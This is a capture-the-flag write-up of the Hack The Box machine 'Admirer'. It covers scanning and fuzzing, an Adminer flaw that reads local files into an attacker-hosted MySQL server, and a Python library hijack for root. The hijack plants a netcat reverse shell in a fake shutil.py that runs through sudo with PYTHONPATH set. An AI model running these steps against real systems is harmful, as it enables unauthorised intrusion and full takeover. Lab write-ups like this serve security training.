Writeups

Hack The Box Writeup: Admirer

For me the first box again after being away from Hack The Box for a while. Admirer focuses on Adminer, the predecessors of the immensely popular phpMyAdmin. The version in question has a vulnerability that I used for the user-flag. Root was achieved by misusing an include in a python backup script.

Hack The Box Admirer

[0x1] Reconnaissance & Enumeration

Step 1 is in this case also the port scan through Nmap. Here are the parameters for standard scripts, version detection, and export to a file.

nmap -sC -sV -p- -T5 -oA admirer-allports admirer
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 13:06 BST
Warning: 10.10.10.187 giving up on port because retransmission cap hit (2).
Nmap scan report for admirer (10.10.10.187)
Host is up (0.014s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
1572/tcp filtered chip-lm
2514/tcp filtered facsys-ntp
11837/tcp filtered unknown
24771/tcp filtered unknown
32876/tcp filtered unknown
37243/tcp filtered unknown
58667/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 419.39 seconds

From the scan, a number of ports emerge. After some checks port 80, for now, is the most interesting. The website does not show much relevant information at first glance.

Hack The Box Admirer website

After some searching on the website, I launched Dirbuster. After some boxes where you have to search for something you don’t expect right away I also used Dirbuster to search for text files and not just PHP files. In this case, Dirbuster finds two text files.

dirbuster 

File found: /admin-dir/contacts.txt - 200
File found: /admin-dir/credentials.txt - 200
DirBuster Stopped

[0x2] Initial Foothold

Through curl, I visit the file and read the output. According to the file, p.wise@admirer.htb is one of the admins.

curl http://admirer/admin-dir/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb

##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb

#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

The second file provides login credentials for mail, ftp and Wordpress.

curl http://admirer/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

With the FTP-credentials, I will log in to Admirer. In the port scan, FTP was also visible as an open service. There is not much to be found beside a MySQL dump file and a website backup.

ftp admirer
Connected to admirer.
220 (vsFTPd 3.0.3)

Name (admirer:user): ftpuser
331 Please specify the password.
Password:

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.

I download both files for further research on my Parrot machine. While looking around in the content of the website backup, I find a robots.txt file in which a clear disallow to a secret folder of Waldo can be found, namely w4ld0s_s3cr3t_d1r.

sudo cat robots.txt
User-agent: *

# This folder contains personal stuff, so no one (not even robots!) should see it - waldo
Disallow: /w4ld0s_s3cr3t_d1r

In the website backup I can find and view this folder from robots.txt. However, the info brings nothing new.

cat w4ld0s_s3cr3t_d1r/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb

#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

The file contains credentials for a bank account. Maybe they might come in handy in the future, but for now, I don’t expect much of them.

cat w4ld0s_s3cr3t_d1r/credentials.txt
[Bank Account]
waldo.11
Ezy]m27}OREc$

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

The contents of this db_admin.php looks more promissing. Let’s write those down, they might come in handy.

cat db_admin.php
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

  // Create connection
  $conn = new mysqli($servername, $username, $password);

  // Check connection
  if ($conn->connect_error) {
      die("Connection failed: " . $conn->connect_error);
  }
  echo "Connected successfully";


  // TODO: Finish implementing this or find a better open source alternative
?>

After searching a bit further in the backup I also come across a folder called utility-scripts. Because it is a backup of the website it might also be on the live website. The path can’t be used directly, but experience teaches us that sometimes you have to search for something you think you can’t reach. In this case, I search for files directly in utility scripts using Wfuzz and big.txt as a wordlist.

Three hits that can be reached directly on the full url (http 200).

wfuzz -c -w /usr/share/wordlists/dirb/big.txt -z list,php --hc 403,404 -t 100 -u http://admirer/utility-scripts/FUZZ.FUZ2Z


Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://admirer/utility-scripts/FUZZ.FUZ2Z
Total requests: 20469

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000001873: 200 51 L 235 W 4157 Ch "adminer - php"
000009618: 200 964 L 4976 W 83990 Ch "info - php"
000013866: 200 0 L 8 W 32 Ch "phptest - php"

Total time: 38.03754
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 538.1261


[0x3] Path to User flag

The page adminer.php provides an Adminer portal with a login for a database. Considering the credentials I found in the connection string I try to log in with Waldo’s account. Unfortunately this doesn’t work. After searching on Google I come across a blog post about a vulnerability in Adminer by logging into the login portal on a local (proprietary) MySQL server and importing a local file from the server. For example an /etc/passwd.

So I installed my own MySQL (MariaDB) server on my machine and created an empty database here (localAdmirer) with a table temp.

MariaDB [(none)]> CREATE DATABASE LocalAdmirer;
MariaDB [(none)]> CREATE USER 'admin'@'%' IDENTIFIED BY 'admirer4dm1n';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON * . * TO 'admin'@'%';
MariaDB [(none)]> FLUSH PRIVILEGES;
MariaDB [(none)]> USE LocalAdmirer
MariaDB [(LocalAdmirer)]> CREATE TABLE temp(data VARCHAR(255));

I am connected from /utility-scipts/adminer.php on the box to my own machine and select the created table in the database: temp.

Hack The Box Admirer login Adminer
Hack The Box Admirer LocalAdminer

The query I perform causes me to import the local file index.php into my database: temp. The ‘../’ is needed to go back one level from the utility scripts directory to the webroot.

Hack The Box Admirer sql query

After the successful import, I see a new connection string with a different password for Waldo.

Hack The Box Admirer import

One of the open ports from the scan is for SSH. Great place to enter Waldo’s account and the new password: &<h5b~yK3F#{PaPB&dA}{H>

The account with the corresponding password is usable and I am logged in as Waldo.

ssh waldo@admirer
[sudo] password for user:
The authenticity of host 'admirer (10.10.10.187)' can't be established.

ECDSA key fingerprint is SHA256:NSIaytJ0GOq4AaLY0wPFdPsnuw/wBUt2SvaCdiFM8xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'admirer,10.10.10.187' (ECDSA) to the list of known hosts. 
waldo@admirer's password:

Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3

Just a quick check to see if the user flag is present in Waldo’s account.

ls
user.txt
waldo@admirer:~$ ls -sla
total 28
4 drwxr-x--- 3 waldo waldo 4096 Apr 29 11:18 .
4 drwxr-xr-x 9 root root 4096 Dec 2 2019 ..
0 lrwxrwxrwx 1 waldo waldo 9 Nov 29 2019 .bash_history -> /dev/null
4 -rw-r--r-- 1 waldo waldo 220 Nov 29 2019 .bash_logout
4 -rw-r--r-- 1 waldo waldo 3526 Nov 29 2019 .bashrc
0 lrwxrwxrwx 1 waldo waldo 9 Dec 2 2019 .lesshst -> /dev/null
0 lrwxrwxrwx 1 waldo waldo 9 Nov 29 2019 .mysql_history -> /dev/null 
4 drwxr-xr-x 2 waldo waldo 4096 Apr 29 10:57 .nano
4 -rw-r--r-- 1 waldo waldo 675 Nov 29 2019 .profile
4 -rw-r----- 1 root waldo 33 Jul 12 08:14 user.txt

Yep, I just got the User flag, Now lets go and enumerate this box some more to find the root-flag.

cat user.txt
d570cb4117b3eee9e6ae9f51fb1bcb7c

[0x4] Path to Root flag

While looking around on the machine I come across the previously found script admin_tasks.sh again. On the website not all functions were available, but if I start the script now, all functions will do it. I try to see if option 6 works and I can write down the shadow file. Maybe you can get the root password out of this.

./admin_tasks.sh
[[[ System Administration Menu ]]] 
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit

Unfortunately, the script might work but I’m not allowed to read the output.

cat /var/www/shadow.bak
Sorry, user waldo is not allowed to execute '/bin/cat /var/www/shadow.bak' as root on admirer.htb.

Making changes in the script is also not allowed.

nano admin_tasks.sh
Sorry, user waldo is not allowed to execute '/bin/nano admin_tasks.sh' as root on admirer.htb.

The directory that contains the script also contains a script called backup.py. This script contains a vulnerability in the form of modifying the PYTHONPATH variable to another location. Because of this, when calling the script at a different location, a shutil.py will be searched for and the script will run with higher permissions (probably root).

waldo@admirer:/opt/scripts$ cat backup.py
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
python3 -c'import sys; print ("\ n" .join (sys.path)) '
\ n/usr/lib/python35.zip\ n/usr/lib/python3.5\ n/usr/lib/python3.5/plat-x86_64-linux-gnu\ n/usr/lib/python3.5/lib-dynload\ n/usr/local/lib/python3.5/dist-packages\ n/usr/lib/python3/dist-packages  

I create a temporary folder called templib and create a new shutil.py in it. In the file I put a Python reverse shell back to my machine. This should work if it is executed with the proper permissions.

cd ~
mkdir templib
nano ~/templib/shutil.py

import os

def make_archive(a,s,d):
    os.system("nc 10.10.14.64 1337 -e /bin/sh") 

On my own machine, I start a Netcat handler on port 1337 (because of hacker).

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

By changing the variable PYTHONPATH to /templib/ and running the admin_tasks.sh script the new location for the shutil.py script is used and the reverse shell is started.

sudo PYTHONPATH=~/templib/ /opt/scripts/admin_tasks.sh

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while... 
waldo@admirer:~/templib$

And there it is, the incoming connection by running the reverse shell.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.187] 60916

Just to be sure, give it a try and get a more interactive shell.

python -c 'import os; os.system("/bin/sh")'

And it worked! The custom script in which I placed the reverse shell is executed as root, because visible through the whoami. Now it’s just a matter of grabbing the root flag.

whoami
root

id
uid=0(root) gid=0(root) groups=0(root) 
hostname
admirer

As always it is neatly placed in /root/Desktop and thus Admirer is officially rooted!

cat root.txt
4d0c9330fa5e92886ab3f11b3e10ac4d


All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!



Tags

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
%d bloggers like this: